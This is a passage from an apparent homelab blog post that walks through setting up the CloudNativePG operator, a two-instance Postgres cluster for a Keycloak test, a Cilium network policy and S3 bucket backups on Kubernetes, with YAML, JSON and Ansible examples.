because so many other services will depend on them, which is why I bring priorities
up here.
The second special class of services is going to be externally visible services.
So for example, it is way more important to me that my Mastodon instance stays
up than that my Gitea instance stays up.</p>
<p>As an example, the <code>hl-critical</code> PriorityClass would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">scheduling.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PriorityClass</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hl-critical</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">value</span>: <span style="color:#ae81ff">500000000</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">globalDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Priority class for critical Homelab pods&#34;</span>
</span></span></code></pre></div><p>And now finally to the main event. &#x1f642;</p>
<h1 id="operator-setup">Operator setup</h1>
<p>The first part to set up for CloudNativePG is the operator. I&rsquo;m using
<a href="https://github.com/cloudnative-pg/charts/tree/main/charts/cloudnative-pg">the Helm chart</a>
for this. There aren&rsquo;t really that many config options for the Operator
itself, so here it is:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">INHERITED_LABELS</span>: <span style="color:#ae81ff">homelab/*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">cloud-native-pg</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;hl-critical&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podMonitorEnabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">grafanaDashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">create</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">monitoringQueriesConfigMap</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">queries</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>Two interesting things here. The first one is the <code>config.data.INHERITED_LABELS</code>
setting. This defines labels which should be taken from the Cluster manifest
and applied to all resources, like Pods, Secrets and so on, created for that
same cluster. Neat thing to have even auto-generated resources properly labeled.</p>
<p>The second noteworthy config is <code>monitoringQueriesConfigMap.queries</code>. In the
default values of the chart, there are a lot of queries pre-defined. But as
I don&rsquo;t have any monitoring yet, I disabled them for now.</p>
<p>And that&rsquo;s it already. Deploying this Helm chart will create a single Pod with
the operator, ready to receive Cluster resources for the actual Postgres deployments.</p>
<h1 id="setting-up-a-cloudnativepg-cluster-for-keycloak">Setting up a CloudNativePG cluster for Keycloak</h1>
<p>Before I get to the cluster setups, I would like to rant for a paragraph. I
don&rsquo;t actually have any app on the cluster which needs Postgres yet. But I still
wanted to test CloudNativePG before moving on to that first app. I wanted something
really simple, perhaps even something which produces some test data on a button
press, with a small web frontend to read the data again, to verify that DB
restores worked properly. So I googled, with something like &ldquo;kubernetes postgres
simple app&rdquo; or &ldquo;simple postgres test app&rdquo;. And I got zero results. None. All I
got were boatloads of articles on how to setup Postgres on Kubernetes, or how
to write a simple app using Postgres with language/framework X. And I&rsquo;m pretty
sure that something like what I want exists. Probably in dozens of varieties,
even.
But Google would not surface those apps. I tried a lot of permutations of the
above queries. Nothing.</p>
<p>But I got lucky, and <a href="https://transitory.social/@rachel">Rachel</a> pointed me
towards <a href="https://www.keycloak.org/">Keycloak</a>. It has the advantage that it
only needs Postgres as a dependency, so it was relatively easy to set up.
Plus, I&rsquo;m already running a Keycloak instance on Nomad, so I&rsquo;m familiar with
it already. And creation of new users is sufficiently close to &ldquo;create database
records on the press of a button&rdquo; for my needs. Thanks Rachel. &#x1f642;</p>
<h2 id="basic-cluster-and-keycloak-setup">Basic cluster and Keycloak setup</h2>
<p>Yes, this is where we finally get to see a Postgres Pod enter the story. &#x1f605;</p>
<p>So as I&rsquo;ve mentioned multiple times before, the Operator is fed with Cluster
type resources and then spawns the appropriate number of Postgres Pods, configures
replication and generates a secret for use by the app.</p>
<p>My Keycloak test cluster looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">keycloak-test</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;32MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;96MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;8MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;983kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;81kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;1GB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2Gi</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span></code></pre></div><p>Because I set the <code>INHERITED_LABELS</code> config in the operator to <code>homelab/*</code>,
all resources created for this cluster will get the label <code>homelab/part-of: keycloak-test</code>.
The <code>metadata.name</code> is significant here, as it will become part of the Pod names
as well as the path for backups, once we get to them. The <code>instances</code> config
determines the replication. There needs to be at least one instance, the primary.
All additional instances are replicas. CloudNativePG also supports more involved
configs, but I&rsquo;m keeping it simple here, with a single primary and a single
replica.</p>
<p>The <code>bootstrap</code> section defines how the database is initially created. The
<code>initdb</code> method I&rsquo;m using here creates an empty database. You can also create
the cluster from another cluster, either from a running cluster, where the new
cluster will use the streaming replication protocol, or from a backup, when the
previous cluster doesn&rsquo;t exist anymore. I intend to give the streaming replication
approach a try when I start migrating services using Postgres from my Nomad cluster.
Perhaps I can skip manual <code>pg_dump</code> backups and restores this way.
I will show restoration of a cluster from another cluster&rsquo;s backups in a later
section.</p>
<p>The <code>postgresql.parameters</code> were initialized via <a href="https://pgtune.leopard.in.ua/">pgtune</a>.
I never tuned my databases before, and I&rsquo;m curious what impact this will have
on DBs with higher load, like my Mastodon DB.</p>
<p>Last but not least, I&rsquo;m telling CloudNativePG to use my SSD-backed <code>rbd-fast</code>
StorageClass and provide a 2GB volume.</p>
<p>Once I deploy this manifest, the Operator gets to work. It will first create
a Postgres Pod for the primary. These Pods use special CloudNativePG images,
not the default Postgres ones. Once that&rsquo;s set up, it will create a second pod,
as a replica.</p>
<p>In the Postgres instances, multiple users will be created. First, the <code>postgres</code>
superuser. This user will not be made available anywhere and is only for internal
use. But another user, in this case called <code>keycloak</code> as configured in
<code>spec.bootstrap.initdb.owner</code> will be created. This user is intended for use
by the app. Its credentials will be put into a Secret called <code>$CLUSTERNAME-app</code>,
in this particular example <code>keycloak-pg-cluster-app</code>. This secret has the
following content:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">host</span>: <span style="color:#ae81ff">keycloak-pg-cluster-rw</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jdbc-uri</span>: <span style="color:#ae81ff">jdbc:postgresql://keycloak-pg-cluster-rw:5432/keycloak?password=6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ&amp;user=keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#ae81ff">6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgpass</span>: <span style="color:#ae81ff">keycloak-pg-cluster-rw:5432:keycloak:keycloak:6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ\n</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">uri</span>: <span style="color:#ae81ff">postgresql://keycloak:6yitavmmX1OP5lDuRC1iL3epmujnWczqKNnnS7lM7Ez4CLGqzqYb1ikTmWGo5EyJ@keycloak-pg-cluster-rw:5432/keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">username</span>: <span style="color:#ae81ff">keycloak</span>
</span></span></code></pre></div><p>This secret contains all the information a client needs to connect to the DB
cluster. The given <code>host: keycloak-pg-cluster-rw</code> is a service CloudNativePG
creates, and which points to the primary of the cluster. In addition to this
service, CloudNativePG also creates <code>keyloak-pg-cluster-r</code> and <code>keycloak-pg-cluster-ro</code>
services, which point to both the primary and replicas or the replica only,
respectively. This can be used when there are some read-only apps using the
database.</p>
<p>Let me show you a quick example of how to connect to the Cluster, with <a href="https://www.keycloak.org/">Keycloak</a>
as an example.</p>
<p><strong>DO NOT USE THIS IN PROD!</strong></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">keycloak-test</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/keycloak/keycloak:23.0.7</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">args</span>: [<span style="color:#e6db74">&#34;start-dev&#34;</span>]
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_URL_HOST</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_URL_PORT</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_URL_DATABASE</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_USERNAME</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">KC_DB_PASSWORD</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">keycloak-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span></code></pre></div><p>This shows how to use <code>valueFrom.secretKeyRef</code> to get the database connection
details from the Secret which was created by CloudNativePG.</p>
<p>There&rsquo;s also one important configuration needed when you&rsquo;re using NetworkPolicy
to secure the Namespace where the cluster is created. This NetworkPolicy needs
to allow the CloudNativePG operator to access the cluster pods. In a CiliumNetworkPolicy,
it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;keycloak-pg-cluster-allow-operator-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cnpg.io/cluster</span>: <span style="color:#ae81ff">keycloak-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">cloudnative-pg</span>
</span></span></code></pre></div><p>Here, I&rsquo;m using the fact that CloudNativePG adds a label with the Cluster name
to each pod to allow access only to the DB pods.
An example for a Kubernetes NetworkPolicy can be found <a href="https://github.com/cloudnative-pg/cloudnative-pg/blob/main/docs/src/samples/networkpolicy-example.yaml">here</a>.</p>
<p>Before continuing to the backup configuration, here is a warning which worried
me, after creating my first cluster:</p>
<pre tabindex="0"><code>&#34;Warning: mismatch architecture between controller and instances. This is an unsupported configuration.&#34;
</code></pre><p>That warning got my intention - I&rsquo;m running most of my workloads on Raspberry
Pi 4, but I also have some x86 machines, just in case I end up with a workload
that doesn&rsquo;t support AArch64.
The really frustrating thing at this point was that, yet again, Google utterly
deserted me. It looked like there were zero hits for the warning message.
Luckily, after some searching of the CloudNativePG repo on GitHub, I found
<a href="https://github.com/cloudnative-pg/cloudnative-pg/issues/3868">this issue</a>. That
then brought me to the realization that multi-arch clusters are currently only
a problem when in-place updates for the manager running in the Postgres containers
are needed. But I did not enable those anyway.</p>
<h2 id="adding-backups">Adding backups</h2>
<p>Next up: Preventing disaster. For backups, I went with the S3 bucket based
backups, instead of the volume snapshots method. This backup method has two
pieces. The first one is continuous backups of the WAL, and the second is a
regular full backup of the <code>PGDATA</code> directory. More info on the backup methods
can be found in the <a href="https://cloudnative-pg.io/documentation/current/backup/">CloudNativePG docs</a>.</p>
<p>But I hit a snag with my overall setup here. As described in a
<a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/#migrating-backup-buckets">previous article</a>,
I&rsquo;ve got a second stage in my backup where I download all of the backup buckets
onto an external HDD. So I need to provide access to the S3 user used for those
external HDD backups to all backup buckets. This includes the Postgres backup
bucket. But sadly, Ceph Rook&rsquo;s <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">Object Bucket Claim</a>
does not support setting a policy on the new bucket. So instead of using OBCs,
I created a single bucket in Ansible. Then I will use Rook&rsquo;s <a href="https://rook.io/docs/rook/latest-release/CRDs/Object-Storage/ceph-object-store-user-crd/">CephObjectStoreUser</a>
to create the S3 user, separately for each Postgres cluster/Namespace. This will
generate a Secret with the necessary credentials to access the bucket, which I
can then use to configure the CloudNativePG backup.</p>
<p>Here again, I&rsquo;m pretty happy with what I was able to do in the Ansible playbook.
Here is the play which creates my backup buckets, together with the task for
the Postgres backup bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Play for creating the backup buckets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;S3 access key id here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;S3 secret access key here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cnpg_backup_users</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">keycloak</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Create cnpg backup bucket</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">cnpg</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">amazon.aws.s3_bucket</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-cnpg</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">access_key</span>: <span style="color:#e6db74">&#34;{{ s3_access }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret_key</span>: <span style="color:#e6db74">&#34;{{ s3_secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ceph</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpoint_url</span>: <span style="color:#ae81ff">https://s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">policy</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;ansible.builtin.template&#39;,&#39;bucket-policies/backup-cnpg.json.template&#39;) }}&#34;</span>
</span></span></code></pre></div><p>Important to note here is the <code>cnpg_backup_users</code> list, which contains all the
users for the CloudNativePG clusters to be backed up. Right now, only the Keycloak
test setup. Here is the bucket policy referenced in the <code>policy</code> key:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>{<span style="color:#960050;background-color:#1e0010">%</span> <span style="color:#960050;background-color:#1e0010">for</span> <span style="color:#960050;background-color:#1e0010">user</span> <span style="color:#960050;background-color:#1e0010">in</span> <span style="color:#960050;background-color:#1e0010">cnpg_backup_users</span> <span style="color:#960050;background-color:#1e0010">%</span>}
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:DeleteObject&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:PutObject&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg/{{ user }}-pg-cluster/*&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg/{{ user }}-pg-cluster&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;arn:aws:iam:::user/cnpg-backup-{{ user }}&#34;</span>
</span></span><span style="display:flex;"><span>            ]
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>{<span style="color:#960050;background-color:#1e0010">%</span> <span style="color:#960050;background-color:#1e0010">endfor</span> <span style="color:#960050;background-color:#1e0010">%</span>}
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-cnpg&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/extern-backups-s3&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This policy grants access to each Db backup user only for certain subdirectories,
namely <code>$USERNAME-pg-cluster/</code>, as by default, CloudNativePG puts the backups
of different clusters into subdirectories with those Cluster&rsquo;s <code>metadata.name</code>.</p>
<p>The CloudNativePG backup config itself then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
